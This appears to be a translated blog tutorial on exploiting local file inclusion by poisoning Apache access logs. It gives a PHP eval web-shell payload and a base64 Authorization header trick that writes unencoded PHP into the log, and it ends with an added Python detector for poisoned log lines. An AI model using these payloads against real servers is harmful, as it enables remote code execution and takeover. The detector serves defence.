Scenario: when we have an LFI (local file inclusion) vulnerability, the most common way to exploit it is to write malicious content into the server logs and include them. Some problems can occur in this process; the following describes those problems and their solutions.
Topic: bypassing URL encoding when writing to Apache logs
First, a brief introduction to Apache logs. By default, Apache logs are stored in the logs folder under the installation directory and consist mainly of the access log and the error log. On Windows these two files are access.log and error.log; on Linux they are access_log and error_log.
(Note: I have set up a test environment on a local virtual machine with the IP address 192.168.5.66)
access.log/access_log records every request made to the web server. Its format is as follows:
192.168.5.66 - - [21/Apr/2014:10:21:04 +0800] "GET /test.php?id=1 HTTP/1.1" 200 2876
The fields are: 1. remote host, 2. blank (ident), 3. blank (login name), 4. request time, 5. method + resource + protocol, 6. status code, 7. bytes sent.
Based on this format, we can construct a malicious access record. The payload is as follows:
http://192.168.5.66/test.php?id=<?php eval($_POST[test]);?>
Entering the preceding address in the browser produces the following record in the access log:
192.168.5.66 - - [21/Apr/2014:11:21:04 +0800] "GET /test.php?id=%3C?php%20eval($_POST[test]);?%3E HTTP/1.1" 200 2956
In this log line, the part
id=%3C?php%20eval($_POST[test]);?%3E
corresponds to the code
id=<?php eval($_POST[test]);?>
As you can see, the characters '<', ' ' and '>' have been URL-encoded as '%3C', '%20' and '%3E', so the logged text is no longer valid PHP. We therefore need to bypass the URL encoding in order to write the correct PHP code into the log.
How the URL encoding is bypassed:
The Authorization field in the HTTP header carries the credentials for HTTP Basic authentication. Its value has the format "Basic base64(user:pass)", and Apache writes the decoded user name into the third field of the access log without URL-encoding it. Accordingly, we reconstruct the payload as follows:
URL: http://192.168.5.115/test.php
Add the header Authorization: Basic PD9waHAgcGhwaW5mbygpPz46MTIzNTY= to the HTTP request
Note: PD9waHAgcGhwaW5mbygpPz46MTIzNTY= is base64(<?php phpinfo()?>:12356)
This method successfully bypasses URL encoding and writes the correct PHP code into the log, as follows:
192.168.5.115 - <?php phpinfo()?> [21/Apr/2014:11:21:04 +0800] "GET /test.php HTTP/1.1" 200 2735
Demo (screenshots omitted):
1. Visit the website root directory.
2. View the access log.
3. Add the Authorization field to the HTTP header.
4. Check the access log to confirm that the Authorization field value has been written.
In this way, PHP code can be written into the Apache log while bypassing URL encoding. As for what to do once the PHP code is in the log, we will not describe it here; you know the rest.
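From the defender's side, the useful observation is that the remote-user field of the Common Log Format is written raw, so a log monitor must inspect that field as well as the (URL-encoded) request line. The following detector is an added example, not code from the original post; the regexes, the field names and the sample log lines (constructed from the entries shown above) are my own assumptions.

```python
import re
from urllib.parse import unquote

# Apache Common Log Format: host ident user [time] "request" status bytes
# The user field is matched non-greedily because a poisoned user name may contain spaces.
CLF_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>.*?) '
    r'\[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# PHP open/close tags; deliberately broad (also hits "<?xml"), tune for your site.
PHP_TAG_RE = re.compile(r'<\?|\?>')


def parse_clf(line):
    """Split one access-log line into its named CLF fields, or None if it does not parse."""
    m = CLF_RE.match(line)
    return m.groupdict() if m else None


def suspicious_fields(line):
    """Return the names of fields that carry PHP tags, raw or URL-encoded."""
    rec = parse_clf(line)
    if rec is None:
        return ["unparseable"]
    # URL-decode first so %3C?php in the request line is caught as well as raw <?php.
    return [name for name in ("user", "request")
            if PHP_TAG_RE.search(unquote(rec[name]))]


def scan(lines):
    """Yield (line index, flagged fields) for every line worth reviewing."""
    return [(i, suspicious_fields(l)) for i, l in enumerate(lines) if suspicious_fields(l)]


# Constructed sample lines modelled on the entries discussed on this page.
SAMPLE_LOG = [
    '192.168.5.66 - - [21/Apr/2014:10:21:04 +0800] "GET /test.php?id=1 HTTP/1.1" 200 2876',
    '192.168.5.66 - - [21/Apr/2014:11:21:04 +0800] '
    '"GET /test.php?id=%3C?php%20eval($_POST[test]);?%3E HTTP/1.1" 200 2956',
    '192.168.5.115 - <?php phpinfo()?> [21/Apr/2014:11:21:04 +0800] "GET /test.php HTTP/1.1" 200 2735',
]

if __name__ == "__main__":
    for idx, fields in scan(SAMPLE_LOG):
        print(f"line {idx}: PHP tags in {fields}")
```

The first line is clean, the second is flagged on the request line only after decoding, and the third is flagged on the user field, which is the case a request-line-only filter misses.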